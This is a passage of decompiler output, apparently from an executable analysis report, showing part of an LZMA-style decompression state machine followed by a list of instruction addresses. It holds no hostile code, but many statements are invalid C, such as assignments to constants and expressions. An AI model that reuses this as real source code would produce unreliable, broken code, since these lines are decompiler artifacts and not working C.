							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                          0x00000000
                                                          0x004063cf
                                                          0x004063cf
                                                          0x004063d3
                                                          0x0040648a
                                                          0x0040648d
                                                          0x00406499
                                                          0x0040637a
                                                          0x0040637a
                                                          0x0040637d
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066f2
                                                          0x004066f2
                                                          0x004066f8
                                                          0x004066fe
                                                          0x00406704
                                                          0x0040671e
                                                          0x00406721
                                                          0x00406727
                                                          0x00406732
                                                          0x00406734
                                                          0x00406706
                                                          0x00406706
                                                          0x00406715
                                                          0x00406719
                                                          0x00406719
                                                          0x0040673e
                                                          0x00406765
                                                          0x00406765
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x00406740
                                                          0x00406740
                                                          0x00406744
                                                          0x004068f3
                                                          0x00000000
                                                          0x004068f3
                                                          0x00406750
                                                          0x00406757
                                                          0x0040675f
                                                          0x00406762
                                                          0x00000000
                                                          0x00406762
                                                          0x004063d9
                                                          0x004063dd
                                                          0x0040691e
                                                          0x0040691e
                                                          0x00406921
                                                          0x00406925
                                                          0x00406925
                                                          0x004063e3
                                                          0x004063e9
                                                          0x004063ec
                                                          0x004063f0
                                                          0x004063f3
                                                          0x004063f7
                                                          0x004068bd
                                                          0x00406909
                                                          0x00406911
                                                          0x00406918
                                                          0x0040691a
                                                          0x00000000
                                                          0x0040691a
                                                          0x004063fd
                                                          0x00406400
                                                          0x00406406
                                                          0x00406408
                                                          0x00406408
                                                          0x0040640b
                                                          0x0040640e
                                                          0x00406411
                                                          0x00406414
                                                          0x00406417
                                                          0x0040641a
                                                          0x0040641b
                                                          0x0040641d
                                                          0x0040641d
                                                          0x0040641d
                                                          0x00406420
                                                          0x00406423
                                                          0x00406426
                                                          0x00406429
                                                          0x00406429
                                                          0x0040642c
                                                          0x0040642e
                                                          0x0040642e
                                                          0x00406431
                                                          0x00406431
                                                          0x00406431
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f10
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16
                                                          0x00000000
                                                          0x00405f21
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f2a
                                                          0x00405f2d
                                                          0x00405f30
                                                          0x00405f34
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f3a
                                                          0x00405f3d
                                                          0x00405f3f
                                                          0x00405f40
                                                          0x00405f43
                                                          0x00405f45
                                                          0x00405f46
                                                          0x00405f48
                                                          0x00405f4b
                                                          0x00405f50
                                                          0x00405f55
                                                          0x00405f5e
                                                          0x00405f71
                                                          0x00405f74
                                                          0x00405f80
                                                          0x00405fa8
                                                          0x00405faa
                                                          0x00405fb8
                                                          0x00405fb8
                                                          0x00405fbc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405fac
                                                          0x00405faf
                                                          0x00405fb0
                                                          0x00405fb0
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405f86
                                                          0x00405f8b
                                                          0x00405f8b
                                                          0x00405f94
                                                          0x00405f9c
                                                          0x00405f9f
                                                          0x00000000
                                                          0x00405fa5
